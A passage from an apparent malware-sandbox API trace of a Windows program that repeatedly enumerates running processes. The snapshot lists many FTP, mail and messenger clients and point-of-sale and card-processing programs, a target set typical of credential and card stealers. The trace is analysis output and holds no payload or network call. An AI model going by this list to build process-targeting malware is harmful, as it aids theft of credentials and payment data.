lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0260.422] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0260.424] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0260.425] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0260.427] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0260.429] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0260.431] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0260.432] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0260.436] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0260.438] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0260.439] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0260.441] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0260.443] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0260.444] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0260.446] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0260.448] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0260.492] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0260.494] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0260.496] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0260.498] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0260.500] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0260.502] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0260.504] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0260.506] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0260.507] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0260.509] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0260.511] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0260.513] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0260.515] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0260.516] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0260.518] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0260.520] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0260.521] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0260.523] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0260.525] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0260.526] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0260.545] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0260.547] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0260.548] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0260.550] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0260.552] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0260.554] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0260.555] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0260.557] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0260.559] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0260.561] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0260.562] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0260.564] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0260.566] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0260.568] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0260.569] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0260.571] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0260.573] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0260.575] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0260.577] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0260.578] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0260.580] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0260.582] CloseHandle (hObject=0x758) returned 1 [0260.582] Sleep (dwMilliseconds=0x64) [0260.734] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0260.744] Process32First (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0260.745] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0260.749] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0260.751] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0260.752] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0260.754] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0260.755] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0260.756] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0260.758] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0260.759] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.761] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.762] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0260.766] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.767] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.769] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.770] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.772] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.773] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.774] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.776] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0260.900] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0260.904] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0260.906] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.908] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0260.910] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0260.912] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0260.914] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, 